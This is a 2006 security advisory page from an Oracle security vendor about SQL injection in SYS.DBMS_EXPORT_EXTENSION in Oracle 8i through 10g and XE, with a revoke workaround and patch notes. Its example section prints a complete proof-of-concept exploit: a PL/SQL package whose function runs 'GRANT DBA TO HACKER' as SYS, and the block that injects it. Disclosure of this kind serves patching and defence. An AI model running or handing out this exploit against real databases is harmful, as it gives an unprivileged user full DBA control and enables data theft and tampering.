Red-Database-Security GmbH is specialized in Oracle Security

Products
Repscan 2.5
Hedgehog Enterprise
Checkpwd (free)

Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g


Name SQL Injection via Oracle DBMS_EXPORT_EXTENSION in Oracle 9i / 10g
Systems Affected Oracle 8i / 9i / 10g / XE
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Credit Exploit N1V1Hd $3c41r3
Exploit bugtraq
Date 20 Apr 2006 (V 1.00)
Status fixed with Oracle CPU July 2006 [DB06]

Details

The following proof of concept exploit code (0day) injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user HACKER. This exploit is working on Oracle 9i Rel. 2 and Oracle 10g eXpress Edition (XE) too.


Workarounds
You can revoke the public privilege from public.

REVOKE EXECUTE ON SYS.DBMS_EXPORT_EXTENSION FROM PUBLIC FORCE;

The package dbms_export_extension is needed for doing export files. After revoking the public grant, you should assign the execute role on dbms_export_extension to your export user (e.g. SYSTEM)


Example
-- Create a function in a package first and inject this function. The function will be executed as user SYS.
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/


CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

-- Inject the function in dbms_export_extension

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE';
TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/


Patch Information
Apply Oracle CPU July 2006.

Patches for Oracle XE are currently not available.

History
21-apr-2006 - Initial version
06-may-2006 - Workaround enhanced. Thanks to Kristina Hackert for the hint.
18-july-2006 - Info from Oracle CPU July 2006 added.




2006 by Red-Database-Security GmbH - last update 18-july-2006

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.